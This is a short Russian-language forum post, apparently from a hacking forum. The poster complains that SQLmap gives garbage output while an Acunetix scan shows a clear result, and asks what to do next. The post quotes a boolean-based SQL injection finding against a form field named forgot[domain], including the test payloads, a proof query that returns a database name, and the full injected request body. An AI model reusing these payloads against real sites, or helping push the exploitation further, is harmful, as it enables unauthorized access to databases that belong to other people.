SQLmap выдаёт ебаную дич !!! по типу "- _"
В то время как в акуше всё чётко
Собственно что делать ?
Код:
Attack Details
POST (multipart) input forgot[domain] was set to -1' OR 3*2*1=6 AND 000337=000337 --
Tests performed:
-1' OR 2+337-337-1=0+0+0+1 -- => TRUE
-1' OR 3+337-337-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+337-337) -- => FALSE
-1' OR 3*2>(0+5+337-337) -- => FALSE
-1' OR 2+1-1+1=1 AND 000337=000337 -- => FALSE
-1' OR 3*2=5 AND 000337=000337 -- => FALSE
-1' OR 3*2=6 AND 000337=000337 -- => TRUE
-1' OR 3*2*0=6 AND 000337=000337 -- => FALSE
-1' OR 3*2*1=6 AND 000337=000337 -- => TRUE
Proof of Exploit
SQL query - SELECT current_database()
obssys
--------------------------------------------------
forgot[domain]=-1' OR 3*2*1=6 AND 000337=000337 -- &forgot[email]=testing@example.com
В то время как в акуше всё чётко
Собственно что делать ?